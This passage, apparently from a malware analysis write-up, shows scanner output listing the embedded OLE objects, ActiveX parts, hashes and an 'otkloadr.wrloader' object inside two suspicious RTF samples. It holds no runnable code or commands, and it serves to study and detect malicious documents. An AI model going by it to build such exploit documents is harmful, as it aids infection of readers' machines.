                           -ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX3.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",469,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX30.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX31.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX32.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX33.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX34.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX35.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX36.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX37.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX38.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX39.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX4.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",502,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX40.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",470,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX5.xml")
                           -ScanObject("ARCHIVE_FS" (1:"OLE2",2095616,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX52.bin")
                                  -ScanObject("OLE2_FS" (0:"UNKNOWN",106,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX52.bin|Root ntry/Contents")
                           -ScanObject("ARCHIVE_FS" (5:"XML",471,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX6.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",471,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX7.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",471,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX8.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX9.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX1.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX10.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX11.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX12.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX13.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX14.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX15.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX16.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX17.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX18.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX19.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX2.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX20.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX21.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX22.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX23.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX24.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX25.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX26.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX27.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX28.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX29.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX3.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX30.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX31.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX32.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX33.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX34.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX35.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX36.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX37.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX38.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX39.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX4.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",396,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX40.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX5.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX6.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX7.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX8.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX9.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",14898,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/document.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",1297,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/fontTable.xml")
                           -ScanObject("ARCHIVE_FS" (0:"UNKNOWN",664,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/media/image1.wmf")
                           -ScanObject("ARCHIVE_FS" (5:"XML",1846,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/settings.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",17304,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/styles.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",6992,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/theme/theme1.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",304,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/webSettings.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",6537,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/_rels/document.xml.rels")
                           -CouldNotScanObject("ARCHIVE_FS","[Content_Types].xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",590,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|_rels/.rels")
                     -ScanObject("OLE2_FS" (0:"UNKNOWN",6,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/.ObjInfo")
       -ScanObject("GENERIC_FS" (0:"UNKNOWN",14,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|object_3")
       -ScanObject("GENERIC_FS" (32:"OLEOBJ",70,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_4")
              -ScanObject("MEM_FS" (31:"HEX",1,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_4|RTFOLEOBJECT|otkloadr.wrloader.1")
                     -ScanObject("MEM_FS" (0:"UNKNOWN",0,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_4|RTFOLEOBJECT|otkloadr.wrloader.1|HEX")
       -ScanObject("GENERIC_FS" (1:"OLE2",518,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_5")
       -ScanObject("GENERIC_FS" (21:"TEXT",48,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objclass_6")
       -ScanObject("GENERIC_FS" (21:"TEXT",22,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|generator_7")
       -ScanObject("GENERIC_FS" (0:"UNKNOWN",60,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|falt_8")
       -ScanObject("GENERIC_FS" (31:"HEX",420,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|panose_9")
              -ScanObject("MEM_FS" (0:"UNKNOWN",210,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|panose_9|HEX")
       -ScanObject("GENERIC_FS" (21:"TEXT",175,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|fonttbl_10")

 

Full example of Sample 2

-ScanObject("GENERIC_FS" (10:"RTF",560752,"d9fac68b6c49c485675d9141f375799d10572999")
       -ScanObject("GENERIC_FS" (32:"OLEOBJ",14385,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0")
              -ScanObject("MEM_FS" (1:"OLE2",14336,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12")
                     -ScanObject("OLE2_FS" (0:"UNKNOWN",114,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/.CompObj")
                     -ScanObject("OLE2_FS" (7:"ZIP",11304,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package")
                           -ScanObject("ARCHIVE_FS" (5:"XML",709,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|docProps/app.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",751,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|docProps/core.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",833,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/document.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",1124,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/endnotes.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",1322,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/fontTable.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",1130,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/footnotes.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",1806,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/settings.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",15937,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/styles.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",6993,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/theme/theme1.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",260,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/webSettings.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",1081,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/_rels/document.xml.rels")
                           -CouldNotScanObject("ARCHIVE_FS","[Content_Types].xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",590,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|_rels/.rels")
                     -ScanObject("OLE2_FS" (0:"UNKNOWN",6,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/.ObjInfo")
       -ScanObject("GENERIC_FS" (32:"OLEOBJ",53297,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1")
              -ScanObject("MEM_FS" (1:"OLE2",53248,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12")
                     -ScanObject("OLE2_FS" (0:"UNKNOWN",114,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/.CompObj")
                     -ScanObject("OLE2_FS" (7:"ZIP",50517,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package")
                           -ScanObject("ARCHIVE_FS" (5:"XML",717,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|docProps/app.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",751,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|docProps/core.xml")
                           -ScanObject("ARCHIVE_FS" (1:"OLE2",2099200,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX1.bin")
                                  -ScanObject("OLE2_FS" (0:"UNKNOWN",0,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX1.bin|Root Entry/")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX1.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX10.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX11.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX12.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX13.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX14.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX15.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX16.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX17.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX18.xml")
                            -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX19.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX2.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX20.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX21.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX22.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX23.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX24.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX25.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX26.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX27.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX28.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX29.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX3.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX30.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX31.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX32.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX33.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX34.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX35.xml")
